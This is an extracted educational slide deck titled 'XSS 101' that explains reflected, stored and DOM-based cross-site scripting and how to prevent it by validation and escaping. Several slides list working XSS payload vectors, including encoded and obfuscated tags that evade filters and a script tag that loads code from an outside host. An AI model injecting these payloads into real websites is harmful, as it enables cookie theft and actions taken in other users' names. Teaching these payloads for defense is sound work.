Xss 101 by-sai-shanthan

Cross Site Scripting (XSS)

What is XSS ?

Cross Site Scripting

lXSS is a vulnerability which when present in websites or web

applications, allows malicious users (Hackers) to insert their

client side code (normally JavaScript) in those web pages.

lWhen this malicious code along with the original webpage gets

displayed in the web client (browsers like IE, Mozilla etc), allows

Hackers to gain greater access of that page.

XSS (-ve) effects

stealing other user’s cookies

l stealing their private information

l performing actions on behalf of other users

l redirecting to other websites

l

lShowing ads in hidden IFRAMES and pop-ups

Type of XSS attacks

lNon-persistent (Reflected)

lPersistent (Stored)

lDOM Based

Non-persistent

lWhen XSS code only gets displayed in the next page to the same user

and not gets saved into persistent storage like database.

lThis type of attack is less harmful, because Hacker can see only their

own cookies and can make modifications in their own current opened

pages.

Vector : %u3008script%u3009alert(document.domain);%u3008/script%u3009

Persistent XSS

l In persistent type of XSS attack, XSS code gets saved into

persistent storage like database with other data and then it is visible

to other users also.

l This type of attack is more vulnerable, because Hacker can steal

cookies and can make modifications in the page.

Vector:

<b onmouseover=alert(/000/);>Click me!</b>

DOM based attack

lDOM Based XSS (or type-0 XSS) is an XSS attack wherein the attack

payload is executed as a result of modifying the DOM environment in the victim s browser used by the original client side script, so that the client side code runs in an unexpected manner.

l That is, the page itself (the HTTP response that is) does not change,

but the client side code contained in the page executes differently due

to the malicious modifications that have occurred in the DOM

environment.

l

Vector:

#”><img src=x onerror=prompt(1);>

Prevention

Never trust the

user input data

No matter where it’s coming from ( GET, POST, COOKIE etc.

Validation at server

lBy sanitizing the input data, we can prevent the malicious

code to enter in the system. lChecking the proper data types helps in cleaning the data.

First of all we should restrict numeric data for numeric fields and

only alphanumeric characters for text fields

l lWhite lists – Allow <strong>, <em> and <br> only – Does help,

but not 100%

l lBlacklists – Block <script> and other attributes such as onload,

onclick, onmouseover etc.

Demo:Bypassing Blacklist WAF

Validation at client side

lBy performing client side (JavaScript) validation,

before submitting the data to server, helps only in

usability aspect of the website.

lIt can’t provide any actual security, because user can

disable the JavaScript. Many JavaScript libraries and

frameworks are available for this.

Escaping output at server

Problem characters can include < > " \ &.These characters can be

replaced with HTML character entities.

For example, < can be replaced with <.

5 Rules for escaping output

#1 - HTML Escape before inserting into element content

#2 - Attribute Escape before inserting into attributes

#3 - JavaScript Escape before inserting into JavaScript data values

#4 - CSS Escape before inserting into style property values

#5 - URL Escape before inserting into URL attributes

XSS vectors

l<IMG SRC=javascript:alert('XSS')> l<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> l<IMG SRC=javascript:alert("XSS")> l<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> l<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> l<IMG

SRC=javascript:alert(String.fromCharCode(88,83,83))> l<IMG

SRC=javascri&#11

2;t:alert('&

#88;SS')>

l

References

http://en.wikipedia.org

http://ha.ckers.org/xss.html

http://www.bugsheet.com/cheat-sheets/100-xss-vectors-by-

ashar-javed

http://www.acsa-

admin.org/openconf2008/modules/request.php?module=oc_pr

ogram&action=view.php&id=104

Thank you

Xss 101 by-sai-shanthan

Technology